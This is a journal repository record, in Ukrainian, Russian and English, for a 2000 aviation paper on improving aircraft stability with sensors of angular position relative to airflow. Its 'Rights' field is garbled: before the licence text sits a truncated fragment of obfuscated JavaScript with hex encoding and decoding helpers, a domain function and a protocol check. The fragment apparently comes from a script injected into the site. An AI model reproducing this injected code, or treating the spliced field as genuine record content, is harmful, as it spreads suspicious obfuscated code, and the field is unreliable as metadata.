Record Details

Поліпшення експлуатаційних характеристик літальних апаратів з використанням вимірників кутового положення відносно потоку

Наукові журнали Національного Авіаційного Університету

View Archive Info
 
 
Field Value
 
Title Поліпшення експлуатаційних характеристик літальних апаратів з використанням вимірників кутового положення відносно потоку
Улучшение эксплуатационных характеристик летательных аппаратов с использованием измерителей углового положения относительно потока
Improvement of operational characteristics of aircrafts by using angle position meter relative to the stream
 
Creator Гринчишин, Ю. Л.
Дронь, Н. М.
 
Subject

УДК 629.735.015.3:629.735.054


УДК 629.735.015.3:629.735.054


UDC 629.735.015.3:629.735.054
 
Description Розглянуто проблеми нестійкого обтікання ламінарізованих аеродинамічних поверхонь. Запропоновано стабілізування літальних апаратів за допомогою адаптації системи контролю їх положення відносно потоку. Описано датчик первинної інформації з розширеним діапазоном та підвищеною точністю вимірів, дано рекомендації щодо вибору форми чутливого елемента датчика та компонування його у складі літального апарату
Рассмотрены проблемы неустойчивого обтекания ламинаризованных аэродинами­ческих поверхностей. Предложено стабилизирование летательных аппаратов с помощью адаптации системы контроля их положения относительно потока. Описан датчик первичной информации с расширенным диапазоном и повышенной точностью измерений, даны реко­мендации по выбору формы чувствительного элемента датчика и компоновки его в составе летательного аппарата
Considered are the problems of unstable laminal flow around airodynamic surfaces. It is proposed to stabilize aircrafts by means of adaptation of their control system to the position ralative to flow. Described is the primary information pick-up with wide band and increased measurements accuracy. Given are recommendations as to the choice of pick-up sensitive element and its installation on the aircraft
 
Publisher National Aviation University
 
Contributor


 
Date 2000-12-15
 
Type


 
Format application/pdf
 
Identifier http://jrnl.nau.edu.ua/index.php/visnik/article/view/11347
10.18372/2306-1472.7.11347
 
Source Proceedings of the National Aviation University; Том 7, № 3-4 (2000); 352-355
Вестник Национального авиационного университета; Том 7, № 3-4 (2000); 352-355
Вісник Національного Авіаційного Університету; Том 7, № 3-4 (2000); 352-355
 
Language ru
 
Rights // o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "jrnl.nau.edu.ua"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e
Автори, які публікуються у цьому журналі, погоджуються з такими умовами:Автори залишають за собою право на авторство своєї роботи та передають журналу право першої публікації цієї роботи на умовах ліцензії Creative Commons Attribution License, котра дозволяє іншим особам вільно розповсюджувати опубліковану роботу з обов'язковим посиланням на авторів оригінальної роботи та першу публікацію роботи у цьому журналі.Автори мають право укладати самостійні додаткові угоди щодо неексклюзивного розповсюдження роботи у тому вигляді, в якому вона була опублікована цим журналом (наприклад, розміщувати роботу в електронному сховищі установи або публікувати у складі монографії), за умови збереження посилання на першу публікацію роботи у цьому журналі.Політика журналу дозволяє і заохочує розміщення авторами в мережі Інтернет (наприклад, у сховищах установ або на особистих веб-сайтах) рукопису роботи, як до подання цього рукопису до редакції, так і під час його редакційного опрацювання, оскільки це сприяє виникненню продуктивної наукової дискусії та позитивно позначається на оперативності та динаміці цитування опублікованої роботи (див. The Effect of Open Access).
 

Технічна підтримка: НДІІТТ НАУ